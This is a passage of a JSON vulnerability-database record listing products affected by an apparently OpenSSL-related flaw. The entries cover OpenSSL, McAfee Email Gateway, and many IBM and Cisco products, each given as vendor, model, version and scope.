"vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8." }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip 